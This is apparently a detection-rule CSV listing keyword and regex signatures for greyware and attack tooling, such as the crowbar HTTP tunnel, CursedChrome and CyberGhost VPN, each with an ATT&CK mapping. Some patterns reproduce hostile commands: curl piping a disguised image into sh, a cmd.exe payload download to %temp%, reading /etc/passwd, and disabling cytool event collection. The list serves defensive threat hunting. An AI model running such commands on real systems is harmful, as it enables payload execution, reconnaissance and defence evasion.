"*4df132ced0bbdbe4965bea528bb11385426a938fcdec3a2905b92d800c9c8fba*",".{0,1000}4df132ced0bbdbe4965bea528bb11385426a938fcdec3a2905b92d800c9c8fba.{0,1000}","greyware_tool_keyword","crowbar","Tunnel TCP over a plain HTTP session","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/q3k/crowbar","1","0","#filehash","N/A","10","10","468","48","2021-01-24T08:21:05Z","2015-02-03T18:40:00Z"
"*515983df3a9aad4aae1e5e37cdf489686b4d7daed5610a75d75ebba006c4ddc9*",".{0,1000}515983df3a9aad4aae1e5e37cdf489686b4d7daed5610a75d75ebba006c4ddc9.{0,1000}","greyware_tool_keyword","crowbar","Tunnel TCP over a plain HTTP session","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/q3k/crowbar","1","0","#filehash","N/A","10","10","468","48","2021-01-24T08:21:05Z","2015-02-03T18:40:00Z"
"*602b348fd6e3407423330d761b04dfdcd8094e552c1184db100c07058343f8d4*",".{0,1000}602b348fd6e3407423330d761b04dfdcd8094e552c1184db100c07058343f8d4.{0,1000}","greyware_tool_keyword","crowbar","Tunnel TCP over a plain HTTP session","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/q3k/crowbar","1","0","#filehash","N/A","10","10","468","48","2021-01-24T08:21:05Z","2015-02-03T18:40:00Z"
"*6510e91b5511a68222bade46531b5d70850559b7da4dadd2fb187015cc811efa*",".{0,1000}6510e91b5511a68222bade46531b5d70850559b7da4dadd2fb187015cc811efa.{0,1000}","greyware_tool_keyword","crowbar","Tunnel TCP over a plain HTTP session","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/q3k/crowbar","1","0","#filehash","N/A","10","10","468","48","2021-01-24T08:21:05Z","2015-02-03T18:40:00Z"
"*8c39d2ef5bd7cb5c7aae4c5094f50cbd39b2a6c3fe65a049c91f7943f679d6b9*",".{0,1000}8c39d2ef5bd7cb5c7aae4c5094f50cbd39b2a6c3fe65a049c91f7943f679d6b9.{0,1000}","greyware_tool_keyword","crowbar","Tunnel TCP over a plain HTTP session","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/q3k/crowbar","1","0","#filehash","N/A","10","10","468","48","2021-01-24T08:21:05Z","2015-02-03T18:40:00Z"
"*91bc0b2cabb6618b228003f1f7f4467b1867eae3c3f42081ee8c4e30e937e77e*",".{0,1000}91bc0b2cabb6618b228003f1f7f4467b1867eae3c3f42081ee8c4e30e937e77e.{0,1000}","greyware_tool_keyword","crowbar","Tunnel TCP over a plain HTTP session","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/q3k/crowbar","1","0","#filehash","N/A","10","10","468","48","2021-01-24T08:21:05Z","2015-02-03T18:40:00Z"
"*9bfd1f0cb077ba95935c260cf66554142867486a42c8d84920e09dd3c6117ed1*",".{0,1000}9bfd1f0cb077ba95935c260cf66554142867486a42c8d84920e09dd3c6117ed1.{0,1000}","greyware_tool_keyword","crowbar","Tunnel TCP over a plain HTTP session","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/q3k/crowbar","1","0","#filehash","N/A","10","10","468","48","2021-01-24T08:21:05Z","2015-02-03T18:40:00Z"
"*b4bed3b73a07c019ea853ee051e35932c97a1547809697dfa495a00710dec8eb*",".{0,1000}b4bed3b73a07c019ea853ee051e35932c97a1547809697dfa495a00710dec8eb.{0,1000}","greyware_tool_keyword","crowbar","Tunnel TCP over a plain HTTP session","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/q3k/crowbar","1","0","#filehash","N/A","10","10","468","48","2021-01-24T08:21:05Z","2015-02-03T18:40:00Z"
"*chown crowbar:crowbar *",".{0,1000}chown\scrowbar\:crowbar\s.{0,1000}","greyware_tool_keyword","crowbar","Tunnel TCP over a plain HTTP session","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/q3k/crowbar","1","0","N/A","N/A","10","10","468","48","2021-01-24T08:21:05Z","2015-02-03T18:40:00Z"
"*cmd/crowbard/*",".{0,1000}cmd\/crowbard\/.{0,1000}","greyware_tool_keyword","crowbar","Tunnel TCP over a plain HTTP session","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/q3k/crowbar","1","1","N/A","N/A","10","10","468","48","2021-01-24T08:21:05Z","2015-02-03T18:40:00Z"
"*crowbar-forward -local=*",".{0,1000}crowbar\-forward\s\-local\=.{0,1000}","greyware_tool_keyword","crowbar","Tunnel TCP over a plain HTTP session","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/q3k/crowbar","1","0","N/A","N/A","10","10","468","48","2021-01-24T08:21:05Z","2015-02-03T18:40:00Z"
"*e4d2ed3af31f30f40f83a73dd6c4dcce275ae8cc85d52c7f30a51bfdb7ebeec2*",".{0,1000}e4d2ed3af31f30f40f83a73dd6c4dcce275ae8cc85d52c7f30a51bfdb7ebeec2.{0,1000}","greyware_tool_keyword","crowbar","Tunnel TCP over a plain HTTP session","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/q3k/crowbar","1","0","#filehash","N/A","10","10","468","48","2021-01-24T08:21:05Z","2015-02-03T18:40:00Z"
"*eb459c0af8c8d7bb91f7c6acc4682f1b2a6add840925bc8a9321c5cc1e2a8137*",".{0,1000}eb459c0af8c8d7bb91f7c6acc4682f1b2a6add840925bc8a9321c5cc1e2a8137.{0,1000}","greyware_tool_keyword","crowbar","Tunnel TCP over a plain HTTP session","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/q3k/crowbar","1","0","#filehash","N/A","10","10","468","48","2021-01-24T08:21:05Z","2015-02-03T18:40:00Z"
"*f154878288857410353e4cabc498941869ffbbd1783f6a1923c6ed92c03dfab6*",".{0,1000}f154878288857410353e4cabc498941869ffbbd1783f6a1923c6ed92c03dfab6.{0,1000}","greyware_tool_keyword","crowbar","Tunnel TCP over a plain HTTP session","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/q3k/crowbar","1","0","#filehash","N/A","10","10","468","48","2021-01-24T08:21:05Z","2015-02-03T18:40:00Z"
"*fc81435479e432562efbbb8ed75a397b565d70593af843bb1ac89628132c7ef7*",".{0,1000}fc81435479e432562efbbb8ed75a397b565d70593af843bb1ac89628132c7ef7.{0,1000}","greyware_tool_keyword","crowbar","Tunnel TCP over a plain HTTP session","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/q3k/crowbar","1","0","#filehash","N/A","10","10","468","48","2021-01-24T08:21:05Z","2015-02-03T18:40:00Z"
"*q3k/crowbar*",".{0,1000}q3k\/crowbar.{0,1000}","greyware_tool_keyword","crowbar","Tunnel TCP over a plain HTTP session","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/q3k/crowbar","1","1","N/A","N/A","10","10","468","48","2021-01-24T08:21:05Z","2015-02-03T18:40:00Z"
"*useradd -rm crowbar*",".{0,1000}useradd\s\-rm\scrowbar.{0,1000}","greyware_tool_keyword","crowbar","Tunnel TCP over a plain HTTP session","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/q3k/crowbar","1","0","N/A","N/A","10","10","468","48","2021-01-24T08:21:05Z","2015-02-03T18:40:00Z"
"*runscript -raw=```curl *",".{0,1000}runscript\s\-raw\=\`\`\`curl\s.{0,1000}","greyware_tool_keyword","crowdstrike falcon","suspicious commands executed remotly by crowdstrike agent","T1033","TA0007","N/A","N/A","Discovery","N/A","1","0","N/A","N/A","6","5","N/A","N/A","N/A","N/A"
"*runscript -raw=```whoami*",".{0,1000}runscript\s\-raw\=\`\`\`whoami.{0,1000}","greyware_tool_keyword","crowdstrike falcon","suspicious commands executed remotly by crowdstrike agent","T1033","TA0007","N/A","N/A","Discovery","N/A","1","0","N/A","N/A","6","5","N/A","N/A","N/A","N/A"
"*csvde -f *",".{0,1000}csvde\s\-f\s.{0,1000}","greyware_tool_keyword","csvde","exports data from Active Directory Domain Services (AD DS) using files that store data in the comma-separated value (CSV) format","T1005","TA0009 - TA0007","N/A","N/A","Collection","https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc732101(v=ws.11)","1","0","N/A","N/A","9","9","N/A","N/A","N/A","N/A"
"*csvde -r * -f *",".{0,1000}csvde\s\-r\s.{0,1000}\s\-f\s.{0,1000}","greyware_tool_keyword","csvde","exports data from Active Directory Domain Services (AD DS) using files that store data in the comma-separated value (CSV) format","T1005","TA0009 - TA0007","N/A","N/A","Collection","https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc732101(v=ws.11)","1","0","N/A","N/A","9","9","N/A","N/A","N/A","N/A"
"*csvde.exe -f *",".{0,1000}csvde\.exe\s\-f\s.{0,1000}","greyware_tool_keyword","csvde","exports data from Active Directory Domain Services (AD DS) using files that store data in the comma-separated value (CSV) format","T1005","TA0009 - TA0007","N/A","N/A","Collection","https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc732101(v=ws.11)","1","0","N/A","N/A","9","9","N/A","N/A","N/A","N/A"
"*csvde.exe -r * -f *",".{0,1000}csvde\.exe\s\-r\s.{0,1000}\s\-f\s.{0,1000}","greyware_tool_keyword","csvde","exports data from Active Directory Domain Services (AD DS) using files that store data in the comma-separated value (CSV) format","T1005","TA0009 - TA0007","N/A","N/A","Collection","https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc732101(v=ws.11)","1","0","N/A","N/A","9","9","N/A","N/A","N/A","N/A"
"*csvde.exe"" -f *",".{0,1000}csvde\.exe\""\s\-f\s.{0,1000}","greyware_tool_keyword","csvde","exports data from Active Directory Domain Services (AD DS) using files that store data in the comma-separated value (CSV) format","T1005","TA0009 - TA0007","N/A","N/A","Collection","https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc732101(v=ws.11)","1","0","N/A","N/A","9","9","N/A","N/A","N/A","N/A"
"*cmd.exe* /c echo curl https://* --output ""%temp%* --ssl no-revoke --insecure --location > ""%temp%*",".{0,1000}cmd\.exe.{0,1000}\s\/c\secho\scurl\shttps\:\/\/.{0,1000}\s\-\-output\s\""\%temp\%.{0,1000}\s\-\-ssl\sno\-revoke\s\-\-insecure\s\-\-location\s\>\s\""\%temp\%.{0,1000}","greyware_tool_keyword","curl","potential suspicious curl command - downloading payload in the temp directory","T1105 - T1059.003","TA0005","N/A","N/A","Collection","https://thedfirreport.com/2024/04/29/from-icedid-to-dagon-locker-ransomware-in-29-days/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*curl http://*.png -k|dd skip=2446 bs=1|sh*",".{0,1000}curl\shttp\:\/\/.{0,1000}\.png\s\-k\|dd\sskip\=2446\sbs\=1\|sh.{0,1000}","greyware_tool_keyword","curl","potential malicious command with curl (|sh)","T1566","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://x.com/CraigHRowland/status/1782938242108837896","1","0","N/A","risk of false positive","9","10","N/A","N/A","N/A","N/A"
"*curl https://*.png -k|dd skip=2446 bs=1|sh*",".{0,1000}curl\shttps\:\/\/.{0,1000}\.png\s\-k\|dd\sskip\=2446\sbs\=1\|sh.{0,1000}","greyware_tool_keyword","curl","potential malicious command with curl (|sh)","T1566","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://x.com/CraigHRowland/status/1782938242108837896","1","0","N/A","risk of false positive","9","10","N/A","N/A","N/A","N/A"
"*/anyproxy.log*",".{0,1000}\/anyproxy\.log.{0,1000}","greyware_tool_keyword","CursedChrome","Chrome-extension implant that turns victim Chrome browsers into fully-functional HTTP proxies allowing you to browse sites as your victims","T1176 - T1219 - T1090","TA0005 - TA0008 - TA0011","N/A","N/A","Defense Evasion","https://github.com/mandatoryprogrammer/CursedChrome","1","0","N/A","anyproxy","10","10","1403","212","2022-12-12T15:12:47Z","2020-04-26T20:55:05Z"
"*/work/anyproxy/bin/anyproxy-ca --generate*",".{0,1000}\/work\/anyproxy\/bin\/anyproxy\-ca\s\-\-generate.{0,1000}","greyware_tool_keyword","CursedChrome","Chrome-extension implant that turns victim Chrome browsers into fully-functional HTTP proxies allowing you to browse sites as your victims","T1176 - T1219 - T1090","TA0005 - TA0008 - TA0011","N/A","N/A","Defense Evasion","https://github.com/mandatoryprogrammer/CursedChrome","1","0","N/A","anyproxy","10","10","1403","212","2022-12-12T15:12:47Z","2020-04-26T20:55:05Z"
"*anyproxy --intercept --ws-intercept *",".{0,1000}anyproxy\s\-\-intercept\s\-\-ws\-intercept\s.{0,1000}","greyware_tool_keyword","CursedChrome","Chrome-extension implant that turns victim Chrome browsers into fully-functional HTTP proxies allowing you to browse sites as your victims","T1176 - T1219 - T1090","TA0005 - TA0008 - TA0011","N/A","N/A","Defense Evasion","https://github.com/mandatoryprogrammer/CursedChrome","1","0","N/A","anyproxy","10","10","1403","212","2022-12-12T15:12:47Z","2020-04-26T20:55:05Z"
"*cut -d: -f1 /etc/passwd*",".{0,1000}cut\s\-d\:\s\-f1\s\/etc\/passwd.{0,1000}","greyware_tool_keyword","cut","linux commands abused by attackers - find guid and suid sensitives perm","T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136","TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002","N/A","N/A","Credential Access","N/A","1","0","N/A","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A"
"*\AppData\Local\CyberGhost*",".{0,1000}\\AppData\\Local\\CyberGhost.{0,1000}","greyware_tool_keyword","CyberGhost VPN","External VPN usage within coporate network","T1567 - T1090","TA0003 - TA0005 - TA0009 - TA0010 - TA0011","N/A","N/A","Defense Evasion","https://www.cyberghostvpn.com/","1","0","N/A","N/A","9","8","N/A","N/A","N/A","N/A"
"*\Applications\VPN\Data\OpenVPN\*",".{0,1000}\\Applications\\VPN\\Data\\OpenVPN\\.{0,1000}","greyware_tool_keyword","CyberGhost VPN","External VPN usage within coporate network","T1567 - T1090","TA0003 - TA0005 - TA0009 - TA0010 - TA0011","N/A","N/A","Defense Evasion","https://www.cyberghostvpn.com/","1","0","N/A","N/A","9","8","N/A","N/A","N/A","N/A"
"*\Applications\VPN\tunnel.dll*",".{0,1000}\\Applications\\VPN\\tunnel\.dll.{0,1000}","greyware_tool_keyword","CyberGhost VPN","External VPN usage within coporate network","T1567 - T1090","TA0003 - TA0005 - TA0009 - TA0010 - TA0011","N/A","N/A","Defense Evasion","https://www.cyberghostvpn.com/","1","0","N/A","N/A","9","8","N/A","N/A","N/A","N/A"
"*\Applications\VPN\wireguard.dll*",".{0,1000}\\Applications\\VPN\\wireguard\.dll.{0,1000}","greyware_tool_keyword","CyberGhost VPN","External VPN usage within coporate network","T1567 - T1090","TA0003 - TA0005 - TA0009 - TA0010 - TA0011","N/A","N/A","Defense Evasion","https://www.cyberghostvpn.com/","1","0","N/A","N/A","9","8","N/A","N/A","N/A","N/A"
"*\CyberGhost 6.lnk*",".{0,1000}\\CyberGhost\s6\.lnk.{0,1000}","greyware_tool_keyword","CyberGhost VPN","External VPN usage within coporate network","T1567 - T1090","TA0003 - TA0005 - TA0009 - TA0010 - TA0011","N/A","N/A","Defense Evasion","https://www.cyberghostvpn.com/","1","0","N/A","N/A","9","8","N/A","N/A","N/A","N/A"
"*\CyberGhost 7.lnk*",".{0,1000}\\CyberGhost\s7\.lnk.{0,1000}","greyware_tool_keyword","CyberGhost VPN","External VPN usage within coporate network","T1567 - T1090","TA0003 - TA0005 - TA0009 - TA0010 - TA0011","N/A","N/A","Defense Evasion","https://www.cyberghostvpn.com/","1","0","N/A","N/A","9","8","N/A","N/A","N/A","N/A"
"*\CyberGhost 8.lnk*",".{0,1000}\\CyberGhost\s8\.lnk.{0,1000}","greyware_tool_keyword","CyberGhost VPN","External VPN usage within coporate network","T1567 - T1090","TA0003 - TA0005 - TA0009 - TA0010 - TA0011","N/A","N/A","Defense Evasion","https://www.cyberghostvpn.com/","1","0","N/A","N/A","9","8","N/A","N/A","N/A","N/A"
"*\CyberGhost.VPN.*.exe*",".{0,1000}\\CyberGhost\.VPN\..{0,1000}\.exe.{0,1000}","greyware_tool_keyword","CyberGhost VPN","External VPN usage within coporate network","T1567 - T1090","TA0003 - TA0005 - TA0009 - TA0010 - TA0011","N/A","N/A","Defense Evasion","https://www.cyberghostvpn.com/","1","0","N/A","N/A","9","8","N/A","N/A","N/A","N/A"
"*\CyberGhost-WireGuard-1.conf*",".{0,1000}\\CyberGhost\-WireGuard\-1\.conf.{0,1000}","greyware_tool_keyword","CyberGhost VPN","External VPN usage within coporate network","T1567 - T1090","TA0003 - TA0005 - TA0009 - TA0010 - TA0011","N/A","N/A","Defense Evasion","https://www.cyberghostvpn.com/","1","0","N/A","N/A","9","8","N/A","N/A","N/A","N/A"
"*\Dashboard.exe.config*",".{0,1000}\\Dashboard\.exe\.config.{0,1000}","greyware_tool_keyword","CyberGhost VPN","External VPN usage within coporate network","T1567 - T1090","TA0003 - TA0005 - TA0009 - TA0010 - TA0011","N/A","N/A","Defense Evasion","https://www.cyberghostvpn.com/","1","0","N/A","N/A","9","8","N/A","N/A","N/A","N/A"
"*\Program Files\CyberGhost*",".{0,1000}\\Program\sFiles\\CyberGhost.{0,1000}","greyware_tool_keyword","CyberGhost VPN","External VPN usage within coporate network","T1567 - T1090","TA0003 - TA0005 - TA0009 - TA0010 - TA0011","N/A","N/A","Defense Evasion","https://www.cyberghostvpn.com/","1","0","N/A","N/A","9","8","N/A","N/A","N/A","N/A"
"*\Windows\Temp\*\wireguard.sys*",".{0,1000}\\Windows\\Temp\\.{0,1000}\\wireguard\.sys.{0,1000}","greyware_tool_keyword","CyberGhost VPN","External VPN usage within coporate network","T1567 - T1090","TA0003 - TA0005 - TA0009 - TA0010 - TA0011","N/A","N/A","Defense Evasion","https://www.cyberghostvpn.com/","1","0","N/A","N/A","9","8","N/A","N/A","N/A","N/A"
"*>CyberGhost 6 Installer<*",".{0,1000}\>CyberGhost\s6\sInstaller\<.{0,1000}","greyware_tool_keyword","CyberGhost VPN","External VPN usage within coporate network","T1567 - T1090","TA0003 - TA0005 - TA0009 - TA0010 - TA0011","N/A","N/A","Defense Evasion","https://www.cyberghostvpn.com/","1","0","N/A","N/A","9","8","N/A","N/A","N/A","N/A"
"*>CyberGhost 7 Installer<*",".{0,1000}\>CyberGhost\s7\sInstaller\<.{0,1000}","greyware_tool_keyword","CyberGhost VPN","External VPN usage within coporate network","T1567 - T1090","TA0003 - TA0005 - TA0009 - TA0010 - TA0011","N/A","N/A","Defense Evasion","https://www.cyberghostvpn.com/","1","0","N/A","N/A","9","8","N/A","N/A","N/A","N/A"
"*>CyberGhost 8 Installer<*",".{0,1000}\>CyberGhost\s8\sInstaller\<.{0,1000}","greyware_tool_keyword","CyberGhost VPN","External VPN usage within coporate network","T1567 - T1090","TA0003 - TA0005 - TA0009 - TA0010 - TA0011","N/A","N/A","Defense Evasion","https://www.cyberghostvpn.com/","1","0","N/A","N/A","9","8","N/A","N/A","N/A","N/A"
"*api.cyberghostvpn.com*",".{0,1000}api\.cyberghostvpn\.com.{0,1000}","greyware_tool_keyword","CyberGhost VPN","External VPN usage within coporate network","T1567 - T1090","TA0003 - TA0005 - TA0009 - TA0010 - TA0011","N/A","N/A","Defense Evasion","https://www.cyberghostvpn.com/","1","1","N/A","N/A","9","8","N/A","N/A","N/A","N/A"
"*CyberGhost 6 Service*",".{0,1000}CyberGhost\s6\sService.{0,1000}","greyware_tool_keyword","CyberGhost VPN","External VPN usage within coporate network","T1567 - T1090","TA0003 - TA0005 - TA0009 - TA0010 - TA0011","N/A","N/A","Defense Evasion","https://www.cyberghostvpn.com/","1","0","N/A","Windows Service Name installed","9","8","N/A","N/A","N/A","N/A"
"*CyberGhost 7 Service*",".{0,1000}CyberGhost\s7\sService.{0,1000}","greyware_tool_keyword","CyberGhost VPN","External VPN usage within coporate network","T1567 - T1090","TA0003 - TA0005 - TA0009 - TA0010 - TA0011","N/A","N/A","Defense Evasion","https://www.cyberghostvpn.com/","1","0","N/A","Windows Service Name installed","9","8","N/A","N/A","N/A","N/A"
"*CyberGhost 8 Service*",".{0,1000}CyberGhost\s8\sService.{0,1000}","greyware_tool_keyword","CyberGhost VPN","External VPN usage within coporate network","T1567 - T1090","TA0003 - TA0005 - TA0009 - TA0010 - TA0011","N/A","N/A","Defense Evasion","https://www.cyberghostvpn.com/","1","0","N/A","Windows Service Name installed","9","8","N/A","N/A","N/A","N/A"
"*CyberGhost S.R.L.*",".{0,1000}CyberGhost\sS\.R\.L\..{0,1000}","greyware_tool_keyword","CyberGhost VPN","External VPN usage within coporate network","T1567 - T1090","TA0003 - TA0005 - TA0009 - TA0010 - TA0011","N/A","N/A","Defense Evasion","https://www.cyberghostvpn.com/","1","0","N/A","N/A","9","8","N/A","N/A","N/A","N/A"
"*CyberGhost Tunnel Client:*",".{0,1000}CyberGhost\sTunnel\sClient\:.{0,1000}","greyware_tool_keyword","CyberGhost VPN","External VPN usage within coporate network","T1567 - T1090","TA0003 - TA0005 - TA0009 - TA0010 - TA0011","N/A","N/A","Defense Evasion","https://www.cyberghostvpn.com/","1","0","N/A","Windows Service Name installed","9","8","N/A","N/A","N/A","N/A"
"*cyberghost*\Dashboard.exe*",".{0,1000}cyberghost.{0,1000}\\Dashboard\.exe.{0,1000}","greyware_tool_keyword","CyberGhost VPN","External VPN usage within coporate network","T1567 - T1090","TA0003 - TA0005 - TA0009 - TA0010 - TA0011","N/A","N/A","Defense Evasion","https://www.cyberghostvpn.com/","1","0","N/A","N/A","9","8","N/A","N/A","N/A","N/A"
"*cyberghost*\Dashboard.Service.exe*",".{0,1000}cyberghost.{0,1000}\\Dashboard\.Service\.exe.{0,1000}","greyware_tool_keyword","CyberGhost VPN","External VPN usage within coporate network","T1567 - T1090","TA0003 - TA0005 - TA0009 - TA0010 - TA0011","N/A","N/A","Defense Evasion","https://www.cyberghostvpn.com/","1","0","N/A","N/A","9","8","N/A","N/A","N/A","N/A"
"*cyberghost*\wyUpdate.exe*",".{0,1000}cyberghost.{0,1000}\\wyUpdate\.exe.{0,1000}","greyware_tool_keyword","CyberGhost VPN","External VPN usage within coporate network","T1567 - T1090","TA0003 - TA0005 - TA0009 - TA0010 - TA0011","N/A","N/A","Defense Evasion","https://www.cyberghostvpn.com/","1","0","N/A","N/A","9","8","N/A","N/A","N/A","N/A"
"*CyberGhost.Browser.dll*",".{0,1000}CyberGhost\.Browser\.dll.{0,1000}","greyware_tool_keyword","CyberGhost VPN","External VPN usage within coporate network","T1567 - T1090","TA0003 - TA0005 - TA0009 - TA0010 - TA0011","N/A","N/A","Defense Evasion","https://www.cyberghostvpn.com/","1","0","N/A","N/A","9","8","N/A","N/A","N/A","N/A"
"*CyberGhost.exe*",".{0,1000}CyberGhost\.exe.{0,1000}","greyware_tool_keyword","CyberGhost VPN","External VPN usage within coporate network","T1567 - T1090","TA0003 - TA0005 - TA0009 - TA0010 - TA0011","N/A","N/A","Defense Evasion","https://www.cyberghostvpn.com/","1","1","N/A","N/A","9","8","N/A","N/A","N/A","N/A"
"*CyberGhost.resources.dll*",".{0,1000}CyberGhost\.resources\.dll.{0,1000}","greyware_tool_keyword","CyberGhost VPN","External VPN usage within coporate network","T1567 - T1090","TA0003 - TA0005 - TA0009 - TA0010 - TA0011","N/A","N/A","Defense Evasion","https://www.cyberghostvpn.com/","1","0","N/A","N/A","9","8","N/A","N/A","N/A","N/A"
"*CyberGhost.Service.exe*",".{0,1000}CyberGhost\.Service\.exe.{0,1000}","greyware_tool_keyword","CyberGhost VPN","External VPN usage within coporate network","T1567 - T1090","TA0003 - TA0005 - TA0009 - TA0010 - TA0011","N/A","N/A","Defense Evasion","https://www.cyberghostvpn.com/","1","1","N/A","N/A","9","8","N/A","N/A","N/A","N/A"
"*CyberGhost.Service.InstallLog*",".{0,1000}CyberGhost\.Service\.InstallLog.{0,1000}","greyware_tool_keyword","CyberGhost VPN","External VPN usage within coporate network","T1567 - T1090","TA0003 - TA0005 - TA0009 - TA0010 - TA0011","N/A","N/A","Defense Evasion","https://www.cyberghostvpn.com/","1","0","N/A","N/A","9","8","N/A","N/A","N/A","N/A"
"*CyberGhost.Service.pdb*",".{0,1000}CyberGhost\.Service\.pdb.{0,1000}","greyware_tool_keyword","CyberGhost VPN","External VPN usage within coporate network","T1567 - T1090","TA0003 - TA0005 - TA0009 - TA0010 - TA0011","N/A","N/A","Defense Evasion","https://www.cyberghostvpn.com/","1","0","N/A","N/A","9","8","N/A","N/A","N/A","N/A"
"*CyberGhost.VPNServices.dll*",".{0,1000}CyberGhost\.VPNServices\.dll.{0,1000}","greyware_tool_keyword","CyberGhost VPN","External VPN usage within coporate network","T1567 - T1090","TA0003 - TA0005 - TA0009 - TA0010 - TA0011","N/A","N/A","Defense Evasion","https://www.cyberghostvpn.com/","1","0","N/A","N/A","9","8","N/A","N/A","N/A","N/A"
"*CyberGhost6Service*",".{0,1000}CyberGhost6Service.{0,1000}","greyware_tool_keyword","CyberGhost VPN","External VPN usage within coporate network","T1567 - T1090","TA0003 - TA0005 - TA0009 - TA0010 - TA0011","N/A","N/A","Defense Evasion","https://www.cyberghostvpn.com/","1","0","N/A","Windows Service Name installed","9","8","N/A","N/A","N/A","N/A"
"*CyberGhost7Service*",".{0,1000}CyberGhost7Service.{0,1000}","greyware_tool_keyword","CyberGhost VPN","External VPN usage within coporate network","T1567 - T1090","TA0003 - TA0005 - TA0009 - TA0010 - TA0011","N/A","N/A","Defense Evasion","https://www.cyberghostvpn.com/","1","0","N/A","Windows Service Name installed","9","8","N/A","N/A","N/A","N/A"
"*CyberGhost8Service*",".{0,1000}CyberGhost8Service.{0,1000}","greyware_tool_keyword","CyberGhost VPN","External VPN usage within coporate network","T1567 - T1090","TA0003 - TA0005 - TA0009 - TA0010 - TA0011","N/A","N/A","Defense Evasion","https://www.cyberghostvpn.com/","1","0","N/A","Windows Service Name installed","9","8","N/A","N/A","N/A","N/A"
"*CyberGhostTunnel$CyberGhost-WireGuard-1*",".{0,1000}CyberGhostTunnel\$CyberGhost\-WireGuard\-1.{0,1000}","greyware_tool_keyword","CyberGhost VPN","External VPN usage within coporate network","T1567 - T1090","TA0003 - TA0005 - TA0009 - TA0010 - TA0011","N/A","N/A","Defense Evasion","https://www.cyberghostvpn.com/","1","0","N/A","Windows Service Name installed","9","8","N/A","N/A","N/A","N/A"
"*CyberGhostVPNSetup.exe*",".{0,1000}CyberGhostVPNSetup\.exe.{0,1000}","greyware_tool_keyword","CyberGhost VPN","External VPN usage within coporate network","T1567 - T1090","TA0003 - TA0005 - TA0009 - TA0010 - TA0011","N/A","N/A","Defense Evasion","https://www.cyberghostvpn.com/","1","1","N/A","N/A","9","8","N/A","N/A","N/A","N/A"
"*CyberGhost-WireGuard-1.conf*",".{0,1000}CyberGhost\-WireGuard\-1\.conf.{0,1000}","greyware_tool_keyword","CyberGhost VPN","External VPN usage within coporate network","T1567 - T1090","TA0003 - TA0005 - TA0009 - TA0010 - TA0011","N/A","N/A","Defense Evasion","https://www.cyberghostvpn.com/","1","0","N/A","Windows Service Name installed","9","8","N/A","N/A","N/A","N/A"
"*download.cyberghostvpn.com*",".{0,1000}download\.cyberghostvpn\.com.{0,1000}","greyware_tool_keyword","CyberGhost VPN","External VPN usage within coporate network","T1567 - T1090","TA0003 - TA0005 - TA0009 - TA0010 - TA0011","N/A","N/A","Defense Evasion","https://www.cyberghostvpn.com/","1","1","N/A","N/A","9","8","N/A","N/A","N/A","N/A"
"*feedback.cyberghostvpn.com*",".{0,1000}feedback\.cyberghostvpn\.com.{0,1000}","greyware_tool_keyword","CyberGhost VPN","External VPN usage within coporate network","T1567 - T1090","TA0003 - TA0005 - TA0009 - TA0010 - TA0011","N/A","N/A","Defense Evasion","https://www.cyberghostvpn.com/","1","1","N/A","N/A","9","8","N/A","N/A","N/A","N/A"
"*ffbkglfijbcbgblgflchnbphjdllaogb*",".{0,1000}ffbkglfijbcbgblgflchnbphjdllaogb.{0,1000}","greyware_tool_keyword","CyberGhost VPN","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","N/A","detection in registry","8","10","N/A","N/A","N/A","N/A"
"*payment.cyberghostvpn.com*",".{0,1000}payment\.cyberghostvpn\.com.{0,1000}","greyware_tool_keyword","CyberGhost VPN","External VPN usage within coporate network","T1567 - T1090","TA0003 - TA0005 - TA0009 - TA0010 - TA0011","N/A","N/A","Defense Evasion","https://www.cyberghostvpn.com/","1","1","N/A","N/A","9","8","N/A","N/A","N/A","N/A"
"*cytool.exe event_collection disable*",".{0,1000}cytool\.exe\sevent_collection\sdisable.{0,1000}","greyware_tool_keyword","cytool","Disables event collection","T1562.001 - T1547.001 - T1055.001","TA0005","N/A","N/A","Defense Evasion","N/A","1","0","N/A","N/A","8","9","N/A","N/A","N/A","N/A"
